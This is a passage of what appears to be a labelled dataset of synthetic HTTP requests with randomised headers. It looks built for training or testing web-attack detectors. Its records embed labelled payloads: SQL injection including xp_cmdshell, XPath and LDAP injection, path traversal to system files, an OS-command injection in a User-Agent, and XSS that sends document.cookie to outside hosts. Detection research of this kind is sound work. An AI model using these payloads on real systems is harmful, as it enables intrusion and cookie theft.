Referer: http://www.ionu.ch/Oeer6edt/lsluapd/hjatnee/ssdtuo/wEhg7.zip
TE: trailers,gzip;q=0.8
Trailer: Max-Forwards
User-Agent: 6oeitntbys (qVjAXQ; lH02_Z; ekKK_eWePc; gQH3Jy5k)
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 229x467
Via: 9.9 217.215.191.236:77772, 21dee/5.3 www.mhaqwte.jpeg
Transfer-Encoding: gzip
Upgrade: fxd/6.1, eet/0.1, fuo/9.7, elrnan/6.1, mmna/4.6
Warning: 832 www.gaeRu.html "xsaazKzls" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 03181480810
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47928
Start - Id: 41612
class: SqlInjection
GET /mtnEieaeyymtd1reOiDn/md/t8d6JFF-lm3F06/7e03tmtvrur.jpg?passthruFZonodeSVservices7.Q=+in%28&tnkttt9iuua2rs=t&tecas6sro=iqsyenaiYam0ael5&9Cwp-xOPR=39&nHpnt=sdhn3h&kitt=a%401uh&ECujQxPm_=871520694&iw8R=aYll&eqew=8%3Bhs+d+&SAIJwXEz=OR+++328040%3E0340844364&91Tpf=9 HTTP/1.0
Host: 205.230.81.78:53451
Connection: onllctr
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, deflate;q=0.6, gzip;q=0.1
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 224.247.255.87
Cookie: esui0lko9ta=nhtitimco/e2i;l@cUtelnet=aaNjSJDKNrs;YQZI=f]usr;srgwaar=imenetterstrt8ua;ifn=s3teisiaaaAaOa9e;iiuiuvtv2urr=1790
Cookie2: $Version="003"
Date: Mon, 23 Apr 07 11:41:25 GMT
ETag: "5AYEIKIO38UMnPD"
Expect: tnEro1
From: tcssd@oays6you.com
If-Modified-Since: Sun, 20 Mar 05 12:09:33 GMT
If-Unmodified-Since: Fri, 06 Feb 04 08:51:24 UTC
If-Match: *
If-None-Match: "cYeNe6C.NaPwWJN"
If-Range: Thu, 04 May 06 12:15:40 CET
Max-Forwards: 9
MIME-Version: 3.1
Pragma: nqsm=n2wk
Proxy-Authorization: Digest qop=habec
Authorization: Digest realm
Range: -27,878-
Referer: http://www.ntwn.net/G1rst/h4eoaei/1tn1oj/lsmtnutd/1ouxik.png
TE: gzip;q=0.0
Trailer: Host
User-Agent: Mozilla/4.5 (Machintosh; U; PPC 3.4; ea-9g; rv:9.3.0) Gecko/06888574
UA-CPU: MIPS
UA-Disp: 5571,966,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0620x1367
Via: HTTP/1.1 www.p4oseg.html, 9.5 166.249.120.111
Transfer-Encoding: gzip
Upgrade: bxnsG/8.0, e7cm/6.6
Warning: 589 www.3dab.jpg "husrsrrj" "Mon, 17 Jul 06 16:04:46 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41612
Start - Id: 49040
class: XPathInjection
GET /hBa7it6eTiehngms/t8R-9zBi9zak72LqB/iyezH87jO22A/iTpM97mqEtAc1b8AKaLM/nlsiho0jmAn3b/ZG.asmx?ahtkoannmgo=pnxo&medcluetcna=+ffs&kiesnio7hyeoo7e=feY&elcstiadOetw0=nrohe&fn_4o=l8as44n%27++or++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28++++i+++%2B++++j%2B++k+++%2B+++l+++%2B+++1%29%5D++++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+%27eenE%27%3D++++%27+++++tl%27+or&sfromyK3dkdAhtpassTU=81389&m4o6bxt=aibnE7&zM9NaV=dzW&tilp8nhbsk=284283&7lhl8=Atlink6A%283%24 HTTP/1.0
Host: www.sestEtoei.be
Connection: keep-alive
Accept: application/*;q=0.4, application/rtf;q=0.4
Accept-Charset: *
Accept-Encoding: deflate, identity, gzip;q=0.5, gzip
Accept-Language: abm-il, tu-ikh0mi, oyfiu-Nfd2ie
Cache-Control: no-cache
Client-ip: 170.235.72.172
Cookie: imgOmz=tcopyokaeit2
Cookie2: $Version="37"
Date: Wed, 14 Jul 04 09:46:16 UTC
ETag: "k-nbkP0EM4jJ4NdD2Z"
Expect: asneEri=oe6du;Oioao=uoxeyx
From: CnsCasts@iaetd.net
If-Modified-Since: Sun, 25 Oct 09 07:43:06 GMT
If-Unmodified-Since: Mon, 02 May 05 22:09:14 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 04 Sep 08 13:31:18 CET
Max-Forwards: 895
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic MVRudG9zYjpnb2VzbmU=
Authorization: Digest cnonce="Csne"
Range: -31
Referer: /rtyi4f.cfm
TE: deflate,gzip
Trailer: Accept-Charset
User-Agent: Mozilla/0.6 (X11; U; Linux i586 4.7; 3i-Nh; rv:6.5.9) Gecko/67901997
UA-CPU: StrongARM
UA-Disp: 792,0293,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1840x9062
Via: 0.8 www.4didh7.css
Transfer-Encoding: tird; sacha=mnhot
Upgrade: sfltc/9.5, Llja/5.6
Warning: 688 135.98.248.226 "d8an8" 
X-Forwarded-For: 25.112.255.42
X-Serial-Number: 00114
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49040
Start - Id: 38028
class: LdapInjection
GET /pF3/ne4n/aZM1Ot@KM8TfmU.4S/eOh-76VF1h11b/fmQdWkJ0Xegk6Y4/ksihi/tmermh7oiiAeee/-3j3Fj4ZTIbR/nle8/sNdESbPDQdrH86TkpnY/tSintnuojpy0ol/V_winnt@.css?2a=w%29jyy&n1d=nhei%40nree%28oh%3A&taScnfr=l0gHLGzBhx5&8BcZOwget=%29+%28%7C%28+cn%3D*o++%27brien*%29%28mail++++%3D*o++++%27brien*+++%29++++ HTTP/1.1
Host: 138.208.190.146
Connection: tbruk6
Accept: */*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 252.123.213.7
Cookie: oud8eg5a=@isbd
Cookie2: $Version="7"
Date: Fri, 09 Mar 07 08:49:36 UTC
ETag: W/"hJ9vUmp.@v3Mr.ewG7Hg"
Expect: 100-continue
From: aFbh@rtrss.de
If-Modified-Since: Mon, 27 Jun 05 09:25:37 UTC
If-Unmodified-Since: Wed, 21 Jun 06 04:37:50 GMT
If-Match: "9bsaevpT_SqBf9ED"
If-None-Match: *
If-Range: Thu, 18 Feb 10 03:25:18 GMT
Max-Forwards: 2
MIME-Version: 8.2
Pragma: aisnr6ea='lti7t'
Proxy-Authorization: ziaee2 vttV0aet=bileft6
Authorization: NTLM QW50bnVlOWlBb1J5VHNobGloc3VuZWhxZElhc2Nhb0ltb2RvM3htZ3hlNG9v
Range: 67-6,809162-
Referer: http://www.Tepb.biz/kteenia/ombnta/Qahcgaa.tar
TE: chunked;q=0.5,deflate;q=0.0,trailers
Trailer: Cache-Control
User-Agent: lthceiEmoEt
UA-CPU: x86
UA-Disp: 2707,126,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 427x816
Via: FTP/1.2 www.3eTae.gif:35, HTTP/4.4 233.138.77.191
Transfer-Encoding: deflate
Upgrade: aol/0.7, dxme/6.7, otfplt/6.5
Warning: 508 192.205.119.35 "nt4dwdbahmiorotHpmts" "Tue, 19 Apr 05 13:54:10 CET"
X-Forwarded-For: 59.200.146.205
X-Serial-Number: 94095568311644
----: --------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38028
Start - Id: 38345
class: LdapInjection
GET /tX.zcH6WMH03Y6XG/nc781P/eY7V81ZmgaCJt9/eiefEno/h5QUIVjqnj/uMTRhYaguuvk3F/dkDBsc_4HMw1Bt@.tiff?EdAt8sIs=%29++%28+%7C+++%280c%3D0q0*%29 HTTP/1.0
Host: www.jxoxab.de
Connection: keep-alive
Accept: application/rtf;q=0.3, image/*, text/xml
Accept-Charset: x-mac-arabic, euc-kr, euc-tw;q=0.7, euc-cn;q=0.3
Accept-Encoding: *;q=0.5
Accept-Language: axIee-Ehy;q=0.5, vN5ydsn3-lmai;q=0.2
Cache-Control: 2a5='9t5artiu'
Client-ip: 103.183.132.251
Cookie: ixcshutdown5ilogmj9=1748073057;qIOueandhpKf=oehttpinsdT+Teh
Cookie2: $Version="4"
Date: Tue, 25 Nov 08 11:27:06 CET
ETag: W/"jY2.4@.9Gn685Hve_bc"
Expect: ieh7h=nriwecet;a0nluni=hep6t
From: ha6o@adqussrlf.gov
If-Modified-Since: Sat, 18 Dec 04 15:06:25 CET
If-Unmodified-Since: Fri, 06 May 05 17:40:11 GMT
If-Match: *
If-None-Match: "PMHHu.9VKtT0TGC"
If-Range: *
Max-Forwards: 08
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic bGlXaXJmYTpTcmFl
Authorization: NTLM bXB0aXhhMGFvZWM3YWhzZXNnb3RzdGVzeGFsb1RjSGxDMGNhOG5lcmloaHM=
Range: -0,575785-
Referer: http://etxp.net/shsMa/cuelw/Sytnu.swf
TE: trailers,deflate;q=0.6
Trailer: Pragma
User-Agent: aq1Anl5fq7
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 896x746
Via: uiwtsY/9.5 www.hnetr.jpeg, itow/7.8 www.iaxw.js
Transfer-Encoding: gzip
Upgrade: ogm/8.2, ejie/9.1, aonr/9.5, etgewo/7.3, ailts/1.2
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 9579642646846
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38345
Start - Id: 41502
class: SqlInjection
POST /ziov1ezkl9elpgDrn/feeacutbdkenmja6F5t.exe? HTTP/1.1
Content-Length: 105
Content-Language: ittgb,dfn
Content-Encoding: gzip
Content-Location: /iBhAaarm/oqlA.wmn
Content-MD5: Y0Uyc1RkdWlpN2llbzNsbg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 29 Jul 09 07:26:25 UTC
Last-Modified: Wed, 10 Mar 10 05:41:36 CET
Host: 16.92.11.180
Connection: close
Accept: text/*, video/quicktime;q=0.4, video/mpeg
Accept-Charset: *
Accept-Encoding: deflate;q=0.5, gzip, deflate, compress
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 221.158.6.21
Cookie: vnediOeAtocwwes=860649;ccinsertz1B9bodyxSx=)2w 7ieNb ~
Cookie2: $Version="13"
Date: Tue, 22 Mar 05 01:06:13 UTC
ETag: W/"6wYRe7NHXfdKLFK"
Expect: maEbbf
From: 8raL@hudstis9.fr
If-Modified-Since: Fri, 01 Sep 06 24:59:04 GMT
If-Unmodified-Since: Mon, 02 Feb 04 11:56:52 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0605
MIME-Version: 5.5
Pragma: xjtueY='Noa3a2d'
Proxy-Authorization: NTLM ZWx3bnJjY25jVGVvbzkzZHRuMWFhbGFydzVhcmVuaHl6YnF2Yw==
Authorization: Basic eHJlZWVJOnNuc2Ry
Range: 229-94,-0,-455
Referer: http://www.fbko.uk/eE740/be1nnjec.php
TE: deflate;q=0.9,trailers,gzip
Trailer: Upgrade
User-Agent: d4a-8hb http://www.dtt9.com
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5893x919
Via: 0.8 www.uuteUZl.shtml, e3epcc/9.0 9.187.170.229
Transfer-Encoding: gzip
Upgrade: tgh/9.5, bumnsf/4.1, dt1/2.5, imuous/2.6
Warning: 111 www.Ieeee3e.gif "edowgieoaEca" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Pkrelam='   +  (    SELECT   TOP     1 that FROM    poRnl)     +  '&pbaase3hpwnssat=tMo1ZB1WI

End - Id: 41502
Start - Id: 41522
class: SqlInjection
POST /AilB5YFcmdOb-Iscript/dewr3fsali/fiee8Lpirtw/54CXEn/8osdAvFrEfccvharet/ta/mbTtX/Gv-iframeuf3.bin? HTTP/1.1
Content-Length: 48
Content-Language: o5qhl,ias,k0heng
Content-Encoding: compress
Content-Location: http://tstolsT.gov/Cszsls/8osItNbp/bifj/sgSaa9.php4
Content-MD5: Y2d0cGhub3I5bWlyNnJ1Yw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 10 Jul 09 01:36:50 CET
Last-Modified: Fri, 04 Jun 04 19:23:35 UTC
Host: www.hes8h.it:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 1.117.126.196
Cookie: Ott=8lcWhFi;8.evZ5sb=73;niTNStkrtlwlpdm=t
Cookie2: $Version="16"
Date: Sun, 22 Apr 07 22:11:54 UTC
ETag: W/"bX0Vg3Kd8@oR3w41"
Expect: maEbbf
From: tdvdi@oee6.st
If-Modified-Since: Sun, 04 May 08 12:24:05 CET
If-Unmodified-Since: Mon, 10 Apr 06 23:38:34 CET
If-Match: "vVn@nhdmuA2X9zNAGy0f"
If-None-Match: *
If-Range: *
Max-Forwards: 48
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM dEU5ZGE5bXRvc1NwYVNlZXlueGFwM3RqdHRuZkJkYWRmYWI0
Authorization: war8dc vont=sei1
Range: -68
Referer: /ooo0hAi/iesP/ewedj2.pdf
TE: gzip
Trailer: User-Agent
User-Agent: dgalomh
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 6912x601
Via: FTP/0.3 www.athiy.shtml
Transfer-Encoding: iebnb
Upgrade: thce3c/8.9, 137aa/4.9, 5eyy/9.6
Warning: 403 68.147.161.49 "4oeh1aeq0hls" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

Mhahep=wobsgbinnahhu&q9GM=OR 985893>0852075389

End - Id: 41522
Start - Id: 42919
class: OsCommanding
GET /tqpWsdSyntum/zxneijos/xUlnnsnnegs/EtOe/ntm21O480QFs7gC7/7hitgsbeth/dowo2uqq@RH/rd@uSGQ.JToZ0GwGV.png?srmoe=39160&eestqeeeonenT=neia3&ye=cP&woNrlbde=aslnaoe2ftppasswd&sh=Hll&tritoSx6im2uhhw=tySe&eccroT2e3rwa=030&mailjhtpasshvKV1ZZ_R=56470430&ahSshnnd=6866729&bjhseoUtrUi=hxhm&vhttpQPBl1Ls=oOsujm1soaabn9t&shisuenEAeh=362177603&9teEoiai53Grn=nrnaez&oe=wEkb4rq&fiahoegoNeao5Pr=985189161 HTTP/1.0
Host: 48.94.54.105
Connection: close
Accept: application/rtf;q=0.3, text/html, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=0
Client-ip: 216.204.56.99
Cookie: BexecCJ4no=opA
Cookie2: $Version="903"
Date: Fri, 22 Jul 05 04:45:02 CET
ETag: "1Tr.A.FGC8u9R3K9@oL"
Expect: 100-continue
If-Modified-Since: Tue, 10 Feb 09 06:46:32 UTC
If-Unmodified-Since: Tue, 24 Oct 06 17:10:48 CET
If-Match: "egwlNH@JjxVbFnFOZN"
If-None-Match: "U0UpltYSMzFfyXQ333"
If-Range: Mon, 09 Nov 09 12:49:17 GMT
Max-Forwards: 43
MIME-Version: 4.5
Pragma: ppyETia=O
Proxy-Authorization: Digest realm
Authorization: a4dL haem4n=0she
Range: 761836-
Referer: /eaogr/mhvw.mpg
TE: chunked,chunked
Trailer: Via
User-Agent: '   ;uftp     -g     /home/olsestle/anarsi    95.153.199.102    /stte  ;
UA-CPU: Sparc
UA-Disp: 0478,435,16
UA-OS: Windows 98
UA-Color: color16
Via: HTTP/8.8 186.54.26.152, 2.0 www.aieeiolT.tiff, 5.3 235.102.137.209:46775
Transfer-Encoding: gzip
Upgrade: L8ahqe/3.3, eola/5.9, onhrln/4.6, iticp/3.3, rnsA6/2.5
Warning: 992 www.tgxepEC.tiff "yer0iasse4hhsuslog" 
X-Forwarded-For: 214.193.235.54
X-Serial-Number: 71827

null

End - Id: 42919
Start - Id: 45287
class: PathTransversal
GET /Sk@5TsED/PLMetcqPH.gif? HTTP/1.1
Host: www.egrqnjrbU.ch
Connection: Drt9cal
Accept: */*;q=0.2
Accept-Charset: iso-8859-2;q=0.0, koi8-r;q=0.9, iso-8859-7
Accept-Encoding: 
Accept-Language: ../../../../../../../../../WINDOWS/autoexec.bat
Cache-Control: no-store
Client-ip: 253.245.176.25
Cookie: ne0dtxe6=ipp
Cookie2: $Version="4"
Date: Wed, 16 Jun 04 14:22:11 GMT
ETag: W/"5sS.bHdpvUqWsjVo-1h"
Expect: ruRriaR=bioddtes;bsfxiao=2oktcsxn
From: eHayb@eTitoou.com
If-Modified-Since: Sat, 11 Jul 09 14:43:23 UTC
If-Unmodified-Since: Wed, 22 Feb 06 10:11:31 UTC
If-Match: "XEjffJGz31bk2n7Fs"
If-None-Match: "yw6.OSZM7TYq7My"
If-Range: *
Max-Forwards: 70
Pragma: no-cache
Proxy-Authorization: Basic b1F1enNlOmR4cnFlYg==
Authorization: Basic NjBycjJyOmhub2I=
Range: 40-,396156-542
Referer: /Rae0.htm
TE: trailers,gzip;q=0.8,chunked;q=0.7
Trailer: TE
User-Agent: Mozilla/9.9 (Windows; U; WinNT 9.1; yO-ne; rv:3.5.8) Gecko/92335201
UA-OS: Win9x
UA-Pixels: 8576x7305
Via: jr5/7.7 67.152.192.239, 7.6 www.6ttB.htm, FTP/8.3 235.1.202.39:64
Transfer-Encoding: identity
Upgrade: sY7kva/6.7, wn5/7.5
Warning: 022 246.223.178.94:2891 "umhssfmiFhwrIlra" "Sat, 10 Sep 05 05:37:31 GMT"
X-Forwarded-For: 238.149.119.17
X-Serial-Number: 1947313
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45287
Start - Id: 35065
class: SqlInjection
GET /jr/9mcIwp-55IBjy8/nx.jqbjtEFRoJ8/ge4eeia/reeeti0settHQ38gs/arSlabu7pK2v6/ehwdH.jsp?dttipepe=456548&svcl9asl=847675&YincludeOt_rB=bgsoundz%3Fr&-MsX=+niDHa&sf3=%27%3BEXEC+master.dbo.xp_cmdshell+%27cmd.exe&dni6sen8=eX_K&KftpMOO0iframeH=Dia%5Delo&trTes3oet0tdixc=oCU%40cQH6-kkc&fcrtidchfea2e=0&Phttpsft=%3EQ%3D8&so6g=5MU0e9VX HTTP/1.0
Host: 29.0.31.147
Connection: close
Accept: image/*, application/*
Accept-Charset: iso-8859-2;q=0.6
Accept-Encoding: 
Accept-Language: deuqs9-invc;q=0.5, ioaaoa-u4a, orr-hh
Cache-Control: no-transform
Date: Sun, 15 Jul 07 20:06:14 UTC
ETag: "@Q2pOBJcB38UINBAlX"
Expect: 100-continue
If-Unmodified-Since: Sat, 04 Dec 04 14:00:33 CET
If-Match: *
If-Range: Fri, 12 Jun 09 11:36:48 GMT
Max-Forwards: 6586
Pragma: no-cache
Authorization: ooeda eestum=adtm
Referer: /bddee/asuOt4l/emasr.txt
User-Agent: Mozilla/0.9 (compatible; MSIE 0.0; Win98; sihs)
Via: 3.8 19.239.68.151
X-Serial-Number: 074180308
----: ---------------------

null

End - Id: 35065
Start - Id: 46582
class: XSS
GET /bRPtXh.asp?9te=tlj5&ymw3D=eie&dyPn=taeid+t0ne1%7CbEeDe+ll&Ew2knop=19&aGIR3CQDOv=07&Qhds2Fem=a+hw&.e.IIbJ2=171&eaaoRiggsD6a=%3F%3Bel9winnte8we&xeozhe5hhmnne6=sucat1drmboot.inieSkeYtiey&LinrbgsoundZgDTO18d=hbeeT-aOs%7E HTTP/1.1
Host: www.eA3t.st:80
Connection: close
Accept: application/rtf;q=0.7, application/*
Accept-Charset: isiri-3342, iso-8859-9;q=0.1, windows-1255;q=0.2
Accept-Encoding: 
Accept-Language: [\xC0][\xBC]script >[document.location.replace    ('http://www.mariseic.com/cgi-bin/it.cgi'+document.cookie);][\xC0][\xBC]/script>
Cache-Control: no-transform
Client-ip: 107.181.44.200
Cookie: 2em7h=n~?ocm5t)0drnewindow.openr;leO1oagbeettt=sUwNC;R5w5RP=idNd4ds;nbphtfsecszcne=9mRI7iatte
Cookie2: $Version="12"
Date: Mon, 13 Jul 09 03:48:45 UTC
ETag: W/"ggPvguC2iGHQlzQ"
Expect: Oric=snie;reana=aeeuq
From: 6eOspypw@jtRfho.ch
If-Modified-Since: Wed, 31 Aug 05 09:57:39 CET
If-Unmodified-Since: Tue, 06 Apr 10 22:07:42 CET
If-Match: *
If-None-Match: *
If-Range: "GQGlQVKeNO7rxnmn2D"
Max-Forwards: 4
MIME-Version: 6.4
Pragma: dQm='nfdaea'
Proxy-Authorization: NTLM cjdsdGM4YWNpdGJzb2UzaWhuY2g0dG9naXRiZG9laWZyOWlo
Authorization: ohri zcoo=lcgr
Range: 758-47,92-,-8
Referer: /tsSyy6/evees/ongoth.mdb
TE: deflate;q=0.3
Trailer: Expect
User-Agent: Mozilla/4.5 (compatible; eOehu6; Linux i386; sysecWei; anroi; o4Tnit)
UA-CPU: 68000
UA-Disp: 676,907,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 991x9240
Via: FTP/7.0 www.tc3bnvy.htm, 0.7 250.202.235.159:79468
Transfer-Encoding: deflate
Upgrade: 2ijn/6.2
Warning: 726 www.ytnR.png "llgcrlhuiap" "Sat, 22 Mar 08 16:22:53 GMT"
X-Forwarded-For: 23.216.88.9
X-Serial-Number: 34246962990912
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46582
Start - Id: 47349
class: XSS
GET /q4/sbbfV4FQ/eriouhoclt7s1f.htm?aiontEtv=s%5Dn&e377rwtrgiwr=%26%7B%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.ch.com%2Fcgi-bin%2Fmeve.cgi%27%2Bdocument.cookie%29%3B%5D%7D%3B&1etdatiamxee=im&jeaeoat=7BG&kitrdrrgram=101&n0ggcx78=deyhomeaeu%3FsUnb&5unMromaagt=g.c&ibbme=776&hzsitoftzRs=IxdZb6Nfutnt&t9kjnnhT=%3Dt HTTP/1.0
Host: 67.246.75.40:96
Connection: fu3h
Accept: video/*;q=0.5
Accept-Charset: iso-8859-6, iso-8859-1, shift_jis;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 46.191.21.117
Cookie: neofs5arimtno=lsanybtsjeth;tsemimz=u5Naat]de8ehwfw[;x0F.S=sf(ni[;ijertnqARdxa=eydteNvpotr;ahlne=[wig
Cookie2: $Version="15"
Date: Sat, 10 May 08 17:05:27 CET
ETag: "27LFIVQI_WFIHUQ0"
Expect: 100-continue
From: KhcttS@4dsl.fr
If-Modified-Since: Sat, 02 Sep 06 07:16:06 CET
If-Unmodified-Since: Thu, 04 Oct 07 14:44:48 CET
If-Match: "41N7uVb2xOKs1TsdNMMt"
If-None-Match: *
If-Range: Tue, 07 Oct 08 11:00:36 CET
Max-Forwards: 838
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: NTLM b25hbmVhbWV0ZkFzdWVhc2hyNUZsOWllYWF0bnFFZGFn
Range: -066761,152-
Referer: http://soFlSys.st/aelgn0/eyiHy/etn8y/43was/otelA.wmn
TE: trailers,trailers,deflate
Trailer: If-None-Match
User-Agent: Mozilla/2.3 (X11; U; Open BSD i586 8.7; ew-by; rv:4.5.5) Gecko/88152947
UA-CPU: x86
UA-Disp: 699,6656,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 575x5791
Via: emor/0.7 www.Cninesed.jpg, 6.3 www.oroh.shtml, 2.6 98.139.179.165
Transfer-Encoding: compress
Upgrade: ni4st/4.0, 7issa/1.3
Warning: 211 www.eefi.shtml "h0shftnyr" "Fri, 11 Nov 05 13:58:15 GMT"
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 0450626600564347
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47349
Start - Id: 36363
class: PathTransversal
GET /oAizP3/FdwqWqSUj/e_sx8CTNp4bLw/g2@V7@Y/QK./oPcoqdapealeuEm9s90/ouDBAJNU07ABj@oAMW.mspx?.3fromJ=0949&atnaIter=+e&y.huA.=replace+8g&eErehrya=k+2ia&Leval5nluXmail64-Z=8521228161&njrocYhira=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&sd=ter HTTP/1.0
Host: www.criHmooaoi.net
Connection: close
Accept: audio/*;q=0.3, audio/basic;q=0.6, video/*;q=0.0
Accept-Charset: x-mac-japanese;q=0.5, windows-1251, windows-1258;q=0.9, iso-8859-7;q=0.3
Accept-Encoding: *
Accept-Language: jettr-stme;q=0.1, ttmnaoy-Ra;q=0.9, Eer-e;q=0.8
Cache-Control: max-age=3645
Client-ip: 225.122.67.50
Date: Fri, 18 Mar 05 08:49:28 UTC
If-Modified-Since: Mon, 12 Oct 09 16:02:28 GMT
If-Match: "o2nxK44KeRbkdufozumS"
If-None-Match: "y1lqHipScwAWmmXK3WN."
If-Range: "EHTH6Uo7iPx7W8RuV"
Max-Forwards: 4
Authorization: rraoiq yszdnbe=SEvzf
Range: -184,-23118,-675
Referer: http://we0ei.com/ynop0t/nvtlr.mdb
User-Agent: 9AiXO@ http://www.gscce.net

null

End - Id: 36363
Start - Id: 35130
class: SqlInjection
PUT /ct8a07SPQjHkmdUa6/ujt2SMxDV.KT/m7SH.mspx? HTTP/1.0
Content-Length: 112
Content-Language: AItmaay
Content-Encoding: compress
Content-Location: http://Nmsab.st/hlnUf/olp3a/jiae1xsd.aspx
Content-MD5: NXNEMXdudDA1dXVpOWU5ZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Aug 07 05:11:52 UTC
Last-Modified: Tue, 03 Oct 06 22:30:38 UTC
Host: www.j5epos.biz
Connection: GeirusO4
Accept: */*;q=0.9
Accept-Charset: windows-1257, euc-tw, windows-874;q=0.4, iso-10646-ucs-2, us-ascii;q=0.0
Accept-Encoding: 
Accept-Language: Pvcs-brgoR;q=0.3, atasva2z-p;q=0.5, qe-ctid6f;q=0.3, edarqa-rxe;q=0.6
Cache-Control: yjLa=y
Client-ip: 86.214.16.25
Cookie: ileess=eduroatat;edr2=at8n
Cookie2: $Version="43"
Date: Tue, 13 Oct 09 02:45:44 UTC
ETag: "wECWPXUQhi-PB9N"
Expect: 100-continue
If-Modified-Since: Mon, 30 Mar 09 20:40:59 CET
If-Unmodified-Since: Mon, 28 Jan 08 20:40:25 CET
If-Match: *
If-None-Match: "TgYUygSVUAV0SzAChIny"
If-Range: Sun, 02 Aug 09 23:58:45 UTC
Max-Forwards: 6
MIME-Version: 6.8
Pragma: e='ftji'
Proxy-Authorization: Digest cnonce="cejy"
Authorization: Basic ZXZzbDpybjNuYm5l
Range: 9644-,893-04607,798896-
Referer: http://www.to6tuSeM.gov/astsiCno.tar.gz
TE: trailers,trailers,deflate
User-Agent: oEtodpg (fM7.Ibk; nv1KNFY_bG; ny1uiQ2mYq; 6v72Ew7ex; hG3lB3)
UA-Disp: 124,974,8
UA-OS: FreeBSD
UA-Color: color8
Via: 4.3 158.99.178.146, 4.3 57.150.156.12, AIm/5.9 www.arei.shtml
Transfer-Encoding: rdtn
Upgrade: masee/8.5, drdmb/5.6, asJ/9.9, oume2Y/4.6, pmsuya/8.2
X-Forwarded-For: 126.226.47.150
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

4cmapet=' /**/    OR   /**/''    =  '&zs=k1P0W&sHwPDvmG=bkxP&ae=v3Rh-HLK&gdiuathmee89hd=thygt8

End - Id: 35130
Start - Id: 36657
class: OsCommanding
GET /0ownemZtebsa/en/f9cok1hewiajooDcTHt/9tewTipiMeiiyosdh/o@I8B@Dih5xn.e/bgAfawrIzP/k5av-CfK5w6H/eFBrAtI6ghdqsjguv.pl?lsWscript2between=ssh9r1%3Ctn&EUDoi2OokaeIo6=%7C+dir+++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C++++%2C&ntnergtrgaesum=7365&so=28&xYmHvzE=9091&KgJO_nwIs=334&r5tonbLuetiSnt=Zetd&etag=s15TSnpCvu.e&hsze=rrhtpassR4voD0v1nti HTTP/1.1
Host: 176.203.42.37:227
Connection: lgHgcwo
Accept: */*;q=0.2
Accept-Charset: iso-8859-8-i, x-mac-chinesesimp, iso-8859-9;q=0.4
Accept-Encoding: gzip, gzip, identity;q=0.5, compress;q=0.0
Accept-Language: *
Cache-Control: max-stale
Client-ip: 112.112.39.6
Cookie: yDHP=a0;teyltebwcniecE=yalmIrredTiih1pe;W77orl.hZ.=dP.;rangahaaroehra=e@6
Cookie2: $Version="51"
Date: Sun, 16 Aug 09 04:52:25 UTC
Expect: oxde
From: zeiTo@a5ng.biz
If-Modified-Since: Tue, 20 Oct 09 04:52:56 UTC
If-Unmodified-Since: Fri, 31 Jul 09 01:41:52 CET
If-Match: *
If-None-Match: "2cdUO98hyQW3@xV"
If-Range: Sun, 01 Mar 09 09:29:57 GMT
